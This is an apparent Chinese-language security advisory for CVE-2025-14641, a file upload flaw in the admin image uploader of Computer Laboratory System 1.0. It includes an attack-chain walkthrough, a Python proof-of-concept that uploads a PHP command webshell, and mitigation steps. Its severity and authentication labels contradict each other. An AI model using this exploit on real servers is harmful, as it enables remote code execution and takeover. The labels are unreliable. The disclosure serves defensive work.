CVE-2025-14641 code-projects Computer Laboratory System 1.0 未授权文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-14641

漏洞类型

未授权文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

code-projects Computer Laboratory System 1.0

漏洞概述

CVE-2025-14641是code-projects Computer Laboratory System 1.0中的一个高危安全漏洞。该漏洞存在于admin/admin_pic.php文件中的图片上传功能，由于对上传文件的类型、内容和扩展名缺乏有效的验证和过滤，攻击者可以利用此漏洞上传任意类型的文件，包括恶意PHP脚本文件。Computer Laboratory System是一套用于管理计算机实验室的Web应用程序，广泛部署于教育机构和企业内部。由于该漏洞需要高权限认证才能利用，但攻击一旦成功，攻击者可以在服务器上执行任意代码，从而完全控制受影响的系统。此漏洞已于2025年12月14日被披露，CVSS评分4.7，属于中等严重程度。漏洞的利用可能需要对目标系统有管理员权限，但一旦利用成功，将对系统的机密性、完整性和可用性造成严重影响。

技术细节

该漏洞存在于Computer Laboratory System 1.0的admin/admin_pic.php文件中，具体问题在于对上传文件缺少严格的验证机制。攻击者通过构造恶意请求，将包含PHP代码的图像文件上传到服务器。上传功能未对文件扩展名进行白名单校验，允许.asp、.php、.phtml等危险扩展名的文件通过。文件内容检测机制缺失，系统仅根据Content-Type或文件扩展名判断文件类型，而未验证文件Magic Bytes或实际内容。文件存储位置可预测且可执行，攻击者上传的恶意脚本通常被保存在可被Web服务器解析的目录下。攻击者可通过访问上传的文件路径（如/admin/uploads/evil.php）来触发恶意代码执行，从而获得服务器远程代码执行能力。漏洞利用需要管理员权限，但一旦成功可完全接管服务器。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的管理员会话凭证

STEP 2

步骤2

构造恶意PHP文件（如webshell）并伪装为图片文件

STEP 3

步骤3

通过POST请求向admin/admin_pic.php发送文件上传请求

STEP 4

步骤4

服务器未验证文件类型和内容，直接保存上传文件到可访问目录

STEP 5

步骤5

攻击者访问上传的恶意文件路径，触发PHP代码执行

STEP 6

步骤6

通过webshell执行系统命令，获得服务器完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14641 PoC - Unrestricted File Upload in Computer Laboratory System 1.0
# Target: admin/admin_pic.php

def exploit(target_url, session_cookie):
    """
    Exploit for CVE-2025-14641
    Uploads a PHP webshell to achieve RCE
    """
    upload_url = f"{target_url}/admin/admin_pic.php"
    
    # PHP webshell payload
    webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    
    files = {
        'image': ('shell.php', webshell, 'image/jpeg')
    }
    
    cookies = {
        'PHPSESSID': session_cookie
    }
    
    try:
        response = requests.post(upload_url, files=files, cookies=cookies, timeout=10)
        
        if response.status_code == 200:
            print("[+] File upload request sent successfully")
            print("[*] Check if shell was uploaded to /admin/uploads/ or similar path")
            print("[*] Access uploaded file with ?cmd=whoami to execute commands")
        else:
            print("[-] Upload failed")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <session_cookie>")
        print("Example: python cve-2025-14641.py http://target.com 'abc123...'")
        sys.exit(1)
    
    exploit(sys.argv[1], sys.argv[2])

影响范围

code-projects Computer Laboratory System 1.0

防御指南

临时缓解措施

立即限制admin/admin_pic.php文件的访问权限，或暂时禁用该文件上传功能。在Web服务器配置中添加规则阻止.php等危险扩展名文件的执行。对上传目录实施安全策略，确保即使文件上传成功也无法被Web服务器解析执行。监控日志中的异常上传行为，及时发现潜在攻击尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14641
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14641
3 Details https://www.cvedetails.com/cve/CVE-2025-14641/
4 VulDB https://vuldb.com/cve/CVE-2025-14641
5 Link https://code-projects.org/
6 Link https://github.com/Yohane-Mashiro/cve/blob/main/upload%203.md
7 Link https://vuldb.com/?ctiid.336374
8 Link https://vuldb.com/?id.336374
9 Link https://vuldb.com/?submit.707865